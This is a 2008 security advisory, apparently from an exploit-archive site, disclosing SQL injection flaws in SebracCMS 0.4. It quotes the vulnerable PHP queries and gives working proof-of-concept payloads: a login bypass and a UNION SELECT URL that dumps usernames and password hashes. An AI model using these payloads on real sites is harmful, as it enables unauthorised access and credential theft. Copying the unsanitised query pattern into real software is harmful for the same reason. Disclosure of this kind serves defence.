SebracCMS <= 0.4 Multiple SQL Injection Vulnerabilities

2008.11.23
Credit: shinmai
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Name: SebracCMS # Webiste: http://www.sebrac.netsons.org/cms/ # Vulnerability type: SQL Injection # Author: # shinmai, 2008-06-28 ###################################################################################### # Description: # # SebracCMS contains two major SQL injection vulnerabilities: # Unsanitazed POST-variables in SQL queries when logging users in. This allows # login access without proper credentials. # And unsanitized GET-variables in SQL queries when loading articles. This allows # an attacker to read all usernames and passwordhashes in the database. # # Vulnerable code in cms/index.php: $n=$_POST['uname']; $p= strtolower($_POST['upass']); $cryp_p = md5($p); //connect to db include('incls/config.php'); $query="select * from sbc_user where uname='$n' and pw='$cryp_p'"; # # POC # # using admin' OR '1'='1 # as the username will allow login without proper registered credentials # # # The second and far more serious SQL Injection is in cms/form/read.php # # This vulnerability allows an attacker to reveal all users and their md5-password hashes. # # # Vulnerable code in cms/form/read.php: $rec=($_GET['recid']); *SNIP* $query="Select * from sbc_articles where idart= '$rec'" or die(mysql_error()); # # POC # # using 1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1 # as the GET-variable 'recid' reveals the first post along with all registered users and their passwordhashes. # Example: http://localhost/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1 # # There are some other SQLI-vulnerabilities there, but these two are the most severe. I was going to include # one more for changing any users password, but I simply didn't have the time to start crafting very complex # injections. Also, I have a sneaking suspicion there's a LFI-vulnerability in the photo-gallery code in the CMS, # but if there is one, I'll write up an other advisory on that. # # As always, Good luck and be safe. #

References:

http://www.securityfocus.com/bid/30003
http://www.milw0rm.com/exploits/5967


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top